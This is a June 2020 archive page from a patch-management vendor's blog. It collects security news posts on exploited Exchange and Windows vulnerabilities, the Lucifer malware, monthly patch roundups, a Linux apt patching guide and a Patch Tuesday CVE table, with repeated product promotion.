Skip to main content
Monthly Archives

June 2020

||

Attackers Weaponizing Exchange Vulnerability

By Patch ManagementNo Comments

Attackers Weaponizing Exchange Vulnerability

Microsoft announced that the Exchange vulnerability covered under CVE-2020-0688 is currently being weaponized in the wild.

Attackers Target Vulnerable Exchange Servers

Microsoft is warning its customers that attackers are increasingly targeting unpatched Exchange servers, with a massive increase in activity since April.

In February, Microsoft issued a patch for a vulnerability tracked as CVE-2020-0688, which could allow attackers to perform remote code execution and take over an infected device. This flaw affects versions of Microsoft Exchange Server dating back to 2010.

CVE-2020-0688 Targeted with Exploits

Microsoft announced the vulnerability covered under CVE-2020-0688 and patched using KB4536988 update has been found to be weaponized in the wild.

When this was released in February, it was not allocated a CVSS score immediately. However, it has now been allocated a score of 8.8 making it extremely important to install.

Robert Brown, Director of Services at Syxsense said, “If possible, try to take a multi factored approach when choosing the patches to deploy each month.  Simply relying on  the vendor severity or the CVSS score alone is simply not enough.”

Since February, many IT organizations have failed to install this update which perhaps is the reason why this vulnerability has been used to expose the Exchange infrastructure in recent sophisticated attacks.

Keep Your Organization Protected

Syxsense allows you to manage and secure vulnerabilities exposed by open ports, disabled firewalls, ineffective user account policies, and security compliance violations from remote workers.

In this unpredictable time, detecting software vulnerabilities isn’t enough. Traditional security scanners only do half the job by identifying and tracking possible vulnerabilities and exposure without eliminating the risk.

Combining security scanning and patch management in a single console, our vulnerability scanning feature not only shows you what’s wrong, but also deploys the solution. Gain visibility into OS and third-party vulnerabilities while increasing cyber resilience through automated patching and security scans. Insights into the OS misconfigurations and compliance violations reduce your attack surface and increase peace of mind.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
|COVID-19 Cyberattacks|||Europol Statement on COVID-19 Cybersecurity||

COVID-19 Causes Increase in Cyberattacks

By NewsNo Comments

COVID-19 Causes Increase in Cyberattacks

As the world continues to face COVID-19 and cyberattacks increase, patch management and endpoint security are becoming more challenging for businesses and IT professionals.

Coronavirus is Leading to Growth in Cyber Attacks

As the world continues to battle COVID-19, patching and securing endpoints has become a much bigger challenge for businesses.

A recent survey from Threatpost revealed that 40% of companies reported seeing increased cyberattacks as they enable remote working.

In a joint statement from the European Commission, ENISA, CERT-EU, the organizations shared concerns about COVID-19 related vulnerabilities.

The coronavirus outbreak has spurred widespread anxiety and forced many people to work from home. Malign actors are actively exploiting these new challenging circumstances to target remote workers, businesses and individuals alike.

Relevant European Union entities are in close contact with one another to track these malicious activities, raise awareness in their respective communities and help protect confined citizens. The European Commission, ENISA, CERT-EU and Europol, among others, will continue to monitor the situation and coordinate as appropriate to ensure a safer cyberspace for the EU and the world.

Despite this call-to-action, many businesses and IT professionals are still unequipped to handle the exploits. Companies are making infrastructure changes on the fly and opening up corporate networks to potential attacks.

Proactively Protecting Your Organization

A secure, roaming product like Syxsense allows you to manage and secure vulnerabilities exposed by open ports, disabled firewalls, ineffective user account policies, and security compliance violations from remote workers.

In this unpredictable time, detecting software vulnerabilities isn’t enough. Traditional security scanners only do half the job by identifying and tracking possible vulnerabilities and exposure without eliminating the risk.

Combining security scanning and patch management in a single console, our vulnerability scanning feature not only shows you what’s wrong, but also deploys the solution. Gain visibility into OS and third-party vulnerabilities while increasing cyber resilience through automated patching and security scans. Insights into the OS misconfigurations and compliance violations reduce your attack surface and increase peace of mind.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Lucifer Malware Targets Windows Systems

By Blog, NewsNo Comments

Lucifer Malware Targets Windows Systems

Experts have identified a new malware called Lucifer that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

New Malware Exploits Critical Vulnerabilities

A new devilish malware is currently exploiting critical vulnerabilities on Windows devices.

Nicknamed Lucifer, the self-propagating malware is targeting Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks. This new variant initially attempts to infect devices by blasting them with attacks in the hopes of exploiting any number of unpatched vulnerabilities.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” stated researchers at Palo Alto Networks’ Unit 42 team. “Applying the updates and patches to the affected software are strongly advised.”

In a blog post, researchers said the latest variant of Lucifer was discovered on May 29 while investigating the exploit of CVE-2019-9081, a bug in the Laravel Framework that can be exploited to achieve remote code execution attacks. There are in fact many other vulnerabilities being exploited such as in Rejetto HTTP File Server (CVE-2014-6287), Microsoft Windows (CVE-2017-0144, CVE-2017-0145, CVE-2017-8464), Apache Struts (CVE-2017-9791), Oracle Weblogic (CVE-2017-10271), ThinkPHP RCE (CVE-2018-20062), and Laravel framework (CVE-2019-9081), among others.

How Lucifer Malware Infects Targets

After successfully exploiting the vulnerability through the use of credential-stuffing, the attacker then connects to the command-and-control (C2) server to execute arbitrary commands on the vulnerable device. These include TCP, UDP, or HTTP denial-of-service attacks. The malware may also infect its targets through IPC, WMI, SMB, and FTP via brute-force as well as through MSSQL, RPC, and network sharing.

“The targets are Windows hosts on both internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation,” the researchers noted. If the SMB protocol is left open, Lucifer then executes several backdoors to establish persistence. These include EternalBlue, EternalRomance, and DoublePulsar exploits. Researchers say Lucifer can also attempt to evade detection or reverse engineering with anti-sandbox capability and enhanced checks for device drivers, DLLs, and virtual devices.

Researchers discovered two versions of the malware: one initiated on May 29 and the other that “wreaked havoc” on June 11. The developer of the malware refers to it as Satan DDoS, but since other malware families already use this name, the researchers at Palo Alto decided “Lucifer” was more fitting.

How to Detect and Avoid Malware

Although malware appears to be growing in sophistication, researchers recommend enterprises protecting themselves with simple security measures such as applying the necessary security updates and strengthening authentication methods.

Syxsense Manage and Syxsense Secure can easily resolve vulnerabilities across an entire environment, whether on-premise or remote. A combination of strict security standards and proper offline backups, paired with a secure systems management and security solution, will ensure that organizations are not affected by rising ransomware and other malware events.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Microsoft Releases Six Out-Of-Band Updates

By News, Patch ManagementNo Comments

Microsoft Releases Six Out-Of-Band Updates

Microsoft released six new out-of-band optional updates for Windows 8.1, 10, and Server 2012 to fix reported printing issues.

New Out-Of-Band Updates Released

On June 22, Microsoft released six out-of-band Optional updates for Windows 8.1, 10, and Server 2012 to fix reported printing issues.  The following updates have been released:

  1. KB4567523 for Windows 10 Version 2004
  2. KB4567515 for Windows 10 Version 1709 Enterprise/Education
  3. KB4567517 for Windows 10 Version 1607 LTSB 2016
  4. KB4567518 for Windows 10 Version 1507 LTSB 2015
  5. KB4567521 for Windows 8.1 / Windows Server 2012 R2
  6. KB4567522 for Windows Server 2012

These are optional updates, so if you are using Windows Update, they will not install by default.

Robert Brown, Director of Services for Syxsense said, “We are recommending all of our clients deploy these updates because there is no definitive list of printers impacted by this vulnerability. We have heard some instances where the print spooler may crash or cause the application itself trying to print to crash.”

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
|||||

June Third-Party Patches and Security Updates

By Patch ManagementNo Comments

June Third-Party Patches and Security Updates

Explore June's third-party and security updates and find out which patches should be prioritized this month to protect your environment.

June Third-Party Patch Updates

It’s been an interesting month for Microsoft updates, considering the June 2020 Patch Tuesday released patches for 129 CVEs covering Windows, Microsoft browsers, and other apps. But what about the other updates?

When it comes to Windows vulnerabilities, Microsoft’s updates only account for roughly 20%; the remaining 80% includes any other vendor, such as Adobe, Google, Mozilla, and Oracle. We’re going to highlight all of the updates released since the beginning of the month.

June 2020 Adobe Updates

Adobe has been widely recognized as releasing many critical security fixes for its software suite in every month. Surprisingly, this month only included a few updates (10 CVEs) for Adobe Flash, Experience Manager, and Framemaker. The critical flash update resolves a use-after-free bug that could allow remote code execution. For Framemaker, the update is also rated as Critical and corrects a single memory corruption as well as two Out-of-Bounds write bugs. The update for Experience Manager is instead rated as Important and addresses six various bugs. Most of these are related to cross-site scripting while a few are Server-side request forgery (SSRF) flaws.

It should be noted that none of the bugs Adobe has patched are listed as publicly known or currently being weaponized.

Google Chrome Patches

The Google Chrome browser is widely-used across the globe for consumers and businesses alike and should next be recognized because of its high-severity update at the very beginning of June, as well as latest release on June 15. The desktop client release at the beginning of the month (v.83.0.4103.97) included 5 security fixes pertaining to use-after-free exploits in WebAuthentication, incorrect security UI in payments, insufficient policy enforcement in developer tools, and use-after-free in payments. It also included medium-severity fixes for Chrome in iOS.

The latest release (v.83.0.4103.106) includes more high-severity fixes for use-after-free in speech, insufficient policy enforcement in WebView, and out-of-bounds write in V8. This desktop version also applies to all desktop versions (Windows, Mac, and Linux) and Google stated will “roll out over the coming days/weeks.”

Latest Firefox Updates

Mozilla Firefox, also a very popular web browser for enthusiasts, sported a number of security fixes across multiple releases in the beginning of June. On June 2, Firefox 77 and Firefox ESR 68.9 were released that included 6 high-severity fixes with 1 moderate- and 2 low-severity. These include resolution for timing attacks on DSA signatures in NSS library, use-after-free exploit in SharedWorkerService, JavaScript type confusion with NativeTypes, and memory safety bugs in v.77 and v.68.9. The lower bugs address WebRender leaking GPU memory when using border-image CSS directive as well as fixes for URL spoofing when using IP addresses or Unicode characters.

The next day after releasing Firefox 77, Mozilla released v.77.0.1 to “disable automatic selection of DNS over HTTPS providers during a test to enable wider deployment in a more controlled way,” Mozilla stated on their site. Mozilla also released a new update for its mail client, Thunderbird, in v.68.9.0. This version includes fixes for when custom headers are added for searching or filtering and cannot be removed, when the Calendar: Today Pane updates prior to loading all data, as well as stability improvements and various security fixes. There are 5 high-severity fixes including some mentioned in Firefox v.77 as well as a fix for a security downgrade with IMAP STARTTLS leading to information leakage.

Syxsense provides all of the updates previously mentioned same-day (including many more) and allows for an exceptionally smooth process with a Patch Deploy task. Simply target all devices for the newest update and the pre-packaged detection will determine if devices do/do not require the update. If they require it, the update will be automatically applied and the vulnerability remediated.

Zoom Continues to Release Updates

Zoom, which has received an exceptional influx of users, both consumers and businesses alike, has been receiving updates frequently due to mixed security concerns. Zoom v.5.0.5 (26213.0602) was released earlier this month and included a fix for supporting GIPHY again in Zoom chat as well as resolving minor bugs and adding new chat features (improved transparency of channel privacy controls and enabling public channel admins and members to add external users).

The latest release in Zoom v.5.1.0 (27830.0612) now allows meeting hosts to now unmute all for meetings of 200 participants or fewer. It also includes some minor bug fixes (not referenced in their release notes) and new/enhanced features (webinar option to delete questions and phone features including personal locations for nomadic emergency services, reconnect options, enhancements to hiding outbound caller ID, and display names for phone numbers). This update also includes enhancements and fixes for Mac, Linux, Android, iOS, and Web users.

Other June Third-Party Updates

Skype v.8.61.0.87 was released mid-June. Although Microsoft hasn’t updated FAQ (at this time) with the latest release notes, there are some changes such as one Microsoft moderator pointing out that the only “visible” change is that Moderated groups are now explicitly labelled as “Moderated Group” and TechSpot highlighting an improved chat experience with “more spacing between contacts and chats, as well as message previews for unread chats, making it even easier to follow conversations.”

Notepad++ is still extremely popular for enthusiasts as a better alternative than the standard Notepad included with Windows. The latest version (v.7.8.7) includes a number of enhancements and bug-fixes such as improving Document Map precision, fixing Find/Replace history lost issues, fixing a file reading failure (network problem) not detected issue, and assigning CTRL-M as default shortcut for invoking mark dialog.

Last, but not least, Cisco Webex released v.40.6.2 and included a few enhancements. These enhancements include the ability to see the participant’ view of what you’re sharing and now guest users can edit their name or email address from the Preview window. Cisco stated “there’s no more second-guessing whether you’re sharing, and you’ll be confident that attendees are seeing the right content,” as well as for guests able to edit their name or email not “having to go back to the pre-meeting window of the Webex Meetings desktop app[;] just hover over your name and click to change the information.” No security fixes were specified by Cisco at this time.

Managing Third-Party Updates

Even though third-party products open-up more vulnerabilities than OS updates typically do, it doesn’t have to be a difficult process to deploy them out. Leveraging a simple and powerful solution with an up-to-date library of third-party products could easily alleviate the issue across organizations.

Syxsense provides all of the updates previously mentioned same-day (including many more) and allows for an exceptionally smooth process with a Patch Deploy task. Simply target all devices for the newest update and the pre-packaged detection will determine if devices do/do not require the update. If they require it, the update will be automatically applied and the vulnerability remediated.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||||Linux Screen||

The Best Way to Patch Linux OS

By Patch ManagementNo Comments

The Best Way to Patch Linux OS

Linux is generally considered a more reliable OS to apply updates to, but not patching will expose your environment just like any other operating system.

How to Patch Linux

If you ever visit a Patch Tuesday article, you will often find comments about using Linux because of its reliability and lack of updates. This is often a huge misconception in the Linux community. Each Linux OS is different and some of the examples below show updates that are needed only a week after the servers were last fully patched.

Installing individual updates for Linux is relatively easy, but it requires you to know the name of the update you want to install.

The following process takes some time due to the use of the command line scripts. However, we recommend you learn the basics of “bash” (Bourne Again Shell), which is the Unix shell since it will greatly help the understanding of the process.

Both experts and the community are correct that the updates are more reliable with almost no Blue / Black Screen of Death (BSOD), but that doesn’t mean Linux doesn’t need to be updated.

Getting Started

  1. Establish a secure SSH remote console to the server, e.g. Putty or Telnet
  2. Run the following command line: apt list –upgradable | grep “-security”

Understanding the resultant screen shot above is essential, as each line records details of the package name, the version it upgrades to and the version installed. For example, the screen shot includes the following:

apparmor/xenial-updates,xenial-security 2.10.95-0ubuntu2.11 amd64 [upgradable from: 2.10.95-0ubuntu2.10]

Legend

Red: Name of package

Green: Name of upgraded package

Purple: Installed version of package

Where is the Severity and Update Description?

If you are used to Microsoft Windows Update (WSUS), you will notice the output of the script only produces the name of the missing update package. In fact, unless you search for the package name on the specific Linux OS website you will never know what are more important than others, or what the package is actually fixing.

Many industry experts believe this knowledge is essential when choosing which to prioritize, especially since many don’t have the time to install packages which are actually not security-related or very low in severity.

On the other hand, how would a Linux administrator know which package fixes a zero-day vulnerability or were absolutely essential to apply? Let’s continue with the install process:

  1. Identify the update(s) you wish to install (copy and paste is really useful)
  2. Run the following command line: sudo apt-get install <package name>=<version> For example, sudo apt-get install apparmor=2.10.95-0ubuntu2.11

Security Privileges

Because you are making changes to the system, your account must have SUDO security privileges, e.g. supervisor. Also pay attention to the spaces above as the command line needs to be exact in order to pass correctly to the Unix shell.

If you wish to install many updates at the same time, use a comma and paste the next update onto the line.

If you want to update a package to the latest version and not necessarily the version which has been detected, you can omit the version. However, this is not recommend or considered best practice due to the testing of specific versions of packages on your servers.

For example: sudo apt-get install apparmor

By default, all Linux packages are installed without a reboot.

Linux is generally considered a more reliable OS to apply updates to, but even so, the lack of patching will expose your environment just like any other operating system.

Patching Linux OS with Syxsense

Syxsense has many automation benefits to the manual patching methodology above. With the discovery process, all Linux devices can be detected and inventoried. Our Patch Manager displays the packages missing just like the scripts above, only we include additional information that is important to IT managers like the description, the vendor severity, and the independent CVSS score which is the cutting edge of vulnerability severity assessment.

Identifying zero-day updates is made easy with the color coding of the interface. The scheduler used to deploy the updated packages allowed flexible timing and reboot behavior to be set with ease. Enable your Linux Administrator to utilize their resources more efficiently by allowing them to automate and report on the patching of your Linux environment.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
|||

Watch the Webcast: June Patch Tuesday

By Patch Management, Patch Tuesday, VideoNo Comments

Watch the Webcast: What You Need to Know For June Patch Tuesday

Watch the recording of our latest webcast to hear industry experts dive into June Patch Tuesday and prioritizing the latest updates.

Prioritize June Patch Tuesday Vulnerabilities

As the IT landscape continues to change, it’s never been more important to have a solid Patch Tuesday strategy.

Our webcast will show you how to prioritize the latest updates for this month’s Microsoft Patch Tuesday. We’ll do a deep dive into each of the bulletins and show you how to navigate the risks of newly-identified vulnerabilities.

Our team of IT management experts have deployed over 100 million patches. Join our free webinar to get industry-leading patch management strategies delivered right to your desk.

View the Webcast

What You Need to Know: June Patch Tuesday

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Microsoft June Patch Tuesday Fixes 129 Vulnerabilities

By Patch Management, Patch TuesdayNo Comments

Microsoft June Patch Tuesday Fixes 129 Vulnerabilities

As the biggest Patch Tuesday to date, Microsoft has issued 129 fixes for vulnerabilities in this month's massive update.

June Patch Tuesday Has Arrived with a Bang

Microsoft have released an astonishing 129 patches today, breaking all known records for the number of fixes released in a single month.

There are 11 Critical patches with the remaining 118 marked Important. Support for Windows 7 and Windows Server 2008 (including R2) was officially ended after January, but there are plenty of updates released this month for customers who have purchased an extension agreement.

Robert Brown, Director of Services for Syxsense said, “This brings the number of patches released this year to over 600, if July carries the same cadence we may reach the total number released for the entire of last year. In addition, there has been 10 Adobe updates released today making this deployment one of the largest we have ever seen. There could be close to 2.3GB of data being delivered to each device – you must prioritize your deployment to reduce the burden on your wide area networks and VPNs.

Patches of Interest

  1. CVE-2020-1281 – Windows OLE Remote Code Execution – This is the second highest vendor severity and CVSS score & impacts every Microsoft Operating System.
  2. CVE-2020-1238 & CVE-2020-1239 – Media Foundation Memory Corruption – This vulnerability impacts Windows 10 from feature update 1709 through 2004, plus Windows Server 2019 & has no countermeasure. We have seen other Media Foundation Memory vulnerabilities already this year and some have become zero day already.
  3. CVE-2020-1292 – OpenSSH is the open source ‘Secure Shell’ (SSH) which was added to Windows 10 and Windows 2019 OS, and is frequently used by Linux Admins and is the beginning of Microsoft cross-platform capability. This vulnerability exposes the “security settings” configuration which could be replaced with malicious code. Although this only impacts Microsoft and NOT Linux, this is still a patch to prioritize this month.

Experience the Power of Syxsense

SYXSENSE IS A CLOUD-BASED SOLUTION THAT HELPS ORGANIZATIONS MANAGE AND SECURE THEIR ENDPOINTS WITH EASE. AUTOMATICALLY DEPLOY OS AND THIRD-PARTY PATCHES AS WELL AS WINDOWS 10 FEATURE UPDATES FOR MICROSOFT, MAC, AND LINUX DEVICES.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

Syxsense Recommendations

Based on the vendor severity and CVSS score, we have made a few recommendations below which you should prioritize this month. Please pay close attention to any of these which are Publicly Aware and / or Weaponized.

 

CVE Ref. Description Vendor Severity CVSS Score Publicly Aware Weaponized Countermeasure Syxsense Recommended
CVE-2020-1238 Media Foundation Memory Corruption Vulnerability Important 8.8 No No No Yes
CVE-2020-1239 Media Foundation Memory Corruption Vulnerability Important 8.8 No No No Yes
CVE-2020-1292 OpenSSH for Windows Elevation of Privilege Vulnerability Important 8.8 No No No Yes
CVE-2020-1206 Windows SMBv3 Client/Server Information Disclosure Vulnerability Important 8.6 No No Yes Yes
CVE-2020-1255 Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability Important 8.5 No No No Yes
CVE-2020-1248 GDI+ Remote Code Execution Vulnerability Critical 8.4 No No No Yes
CVE-2020-1281 Windows OLE Remote Code Execution Vulnerability Critical 7.8 No No No Yes
CVE-2020-1300 Windows Remote Code Execution Vulnerability Critical 7.8 No No No Yes
CVE-2020-1286 Windows Shell Remote Code Execution Vulnerability Critical 7.8 No No No Yes
CVE-2020-1260 VBScript Remote Code Execution Vulnerability Critical 7.5 No No No Yes
CVE-2020-1299 LNK Remote Code Execution Vulnerability Critical 6.8 No No No Yes
CVE-2020-1073 Scripting Engine Memory Corruption Vulnerability Critical 4.2 No No No Yes
CVE-2020-1219 Microsoft Browser Memory Corruption Vulnerability Critical TBC No No No Yes
CVE-2020-1181 Microsoft SharePoint Server Remote Code Execution Vulnerability Critical TBC No No No Yes
CVE-2020-1213 VBScript Remote Code Execution Vulnerability Critical TBC No No No Yes
CVE-2020-1216 VBScript Remote Code Execution Vulnerability Critical TBC No No No Yes
CVE-2020-1311 Component Object Model Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1211 Connected Devices Platform Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1203 Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1257 Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1278 Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1293 Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1317 Group Policy Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1208 Jet Database Engine Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2020-1236 Jet Database Engine Remote Code Execution Vulnerability Important 7.8 No No No
CVE-2020-1222 Microsoft Store Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1309 Microsoft Store Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1212 OLE Automation Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1271 Windows Backup Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1280 Windows Bluetooth Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1162 Windows Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1324 Windows Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1234 Windows Error Reporting Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1199 Windows Feedback Hub Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-0915 Windows GDI Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-0916 Windows GDI Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1272 Windows Installer Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1277 Windows Installer Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1302 Windows Installer Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1237 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1246 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1262 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1264 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1266 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1269 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1273 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1274 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1275 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1276 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1307 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1316 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1279 Windows Lockscreen Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1254 Windows Modules Installer Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1201 Windows Now Playing Session Manager Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1231 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1233 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1235 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1265 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1282 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1304 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1306 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1334 Windows Runtime Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1305 Windows State Repository Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1287 Windows Wallet Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1294 Windows Wallet Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1270 Windows WLAN Service Elevation of Privilege Vulnerability Important 7.8 No No No
CVE-2020-1230 VBScript Remote Code Execution Vulnerability Important 7.5 No No No
CVE-2020-1301 Windows SMB Remote Code Execution Vulnerability Important 7.5 No No Yes
CVE-2020-1284 Windows SMBv3 Client/Server Denial of Service Vulnerability Important 7.5 No No Yes
CVE-2020-1120 Connected User Experiences and Telemetry Service Denial of Service Vulnerability Important 7.1 No No No
CVE-2020-1202 Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1247 Win32k Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1251 Win32k Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1291 Windows Network Connections Service Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1209 Windows Network List Service Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1196 Windows Print Configuration Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1217 Windows Runtime Information Disclosure Vulnerability Important 7 No No No
CVE-2020-1314 Windows Text Service Framework Elevation of Privilege Vulnerability Important 7 No No No
CVE-2020-1232 Media Foundation Information Disclosure Vulnerability Important 6.5 No No No
CVE-2020-1207 Win32k Elevation of Privilege Vulnerability Important 6.4 No No No
CVE-2020-1253 Win32k Elevation of Privilege Vulnerability Important 6.4 No No No
CVE-2020-1258 Win32k Elevation of Privilege Vulnerability Important 6.4 No No No
CVE-2020-1310 Win32k Elevation of Privilege Vulnerability Important 6.4 No No No
CVE-2020-1244 Connected User Experiences and Telemetry Service Denial of Service Vulnerability Important 6.3 No No No
CVE-2020-1197 Windows Error Reporting Manager Elevation of Privilege Vulnerability Important 6.3 No No No
CVE-2020-1204 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability Important 6.3 No No No
CVE-2020-1160 Microsoft Graphics Component Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1290 Win32k Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1283 Windows Denial of Service Vulnerability Important 5.5 No No No
CVE-2020-1261 Windows Error Reporting Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1263 Windows Error Reporting Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1348 Windows GDI Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1194 Windows Registry Denial of Service Vulnerability Important 5.5 No No No
CVE-2020-1268 Windows Service Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1220 Microsoft Edge (Chromium-based) in IE Mode Spoofing Vulnerability Important 5.4 No No No
CVE-2020-1241 Windows Kernel Security Feature Bypass Vulnerability Important 5.3 No No No
CVE-2020-1296 Windows Diagnostics & feedback Information Disclosure Vulnerability Important 5 No No No
CVE-2020-1315 Internet Explorer Information Disclosure Vulnerability Important 4.3 No No No
CVE-2020-1242 Microsoft Edge Information Disclosure Vulnerability Important 4.3 No No No
CVE-2020-1259 Windows Host Guardian Service Security Feature Bypass Vulnerability Important 4.3 No No No
CVE-2020-1329 Microsoft Bing Search Spoofing Vulnerability Important TBC No No No
CVE-2020-1225 Microsoft Excel Remote Code Execution Vulnerability Important TBC No No No
CVE-2020-1226 Microsoft Excel Remote Code Execution Vulnerability Important TBC No No No
CVE-2020-1321 Microsoft Office Remote Code Execution Vulnerability
|||

Windows 10 2004: What IT Departments Should Expect

By NewsNo Comments

Windows 10 2004: What IT Departments Should Expect

Microsoft has released Windows 10, version 2004. Find out the new features for security and performance that IT professionals should pay attention to.

Microsoft recently released Windows 10’s May 2020 Update. Codenamed 20H1, the spring release is referred to as “version 2004,” and includes a number of new features for security and performance.

Contrary to the 1909 (Fall 2019) Update that was more of a service pack or cumulative update with little changes, this update includes many changes across various areas of the operating system. For organizations planning to deploy the latest release, it’s strongly recommended to peruse the list of new features (as well as features deprecated) and, as always, test it first.

New Features in Windows 10 2004

New Cortana Experience

The new app has taken a significant shift, so if you’re used to using the digital assistant, be prepared.

The new version is mainly focused on increasing productivity—it has removed features for music, smart home, and third-party options. Additionally, Microsoft has removed Cortana on Android and iOS as well as unsupported Windows 10 versions. There are still improvements including interface enhancements and better integration with email, calendars, and other Windows apps.

Windows Subsystem for Linux 2

The Linux subsystem, which has been in Windows 10 for some time, has been majorly changed. It now runs entirely in a lightweight virtual machine managed by Windows. The full Linux kernel now enables full system call compatibility, offers great performance improvements, and can be easily updated through Windows Update. You can learn much more about the new WSL 2 by clicking here.

Windows Sandbox Improvements

The Windows Sandbox was introduced last year with the spring release of Windows 10 1903 and allows users to launch virtual devices for safe testing with a minimal version of Windows 10. Microsoft recently rolled-out new features to further automation including support for configuration files, audio input enhancements, and better use of administrative hotkeys.

Cloud Recovery Option

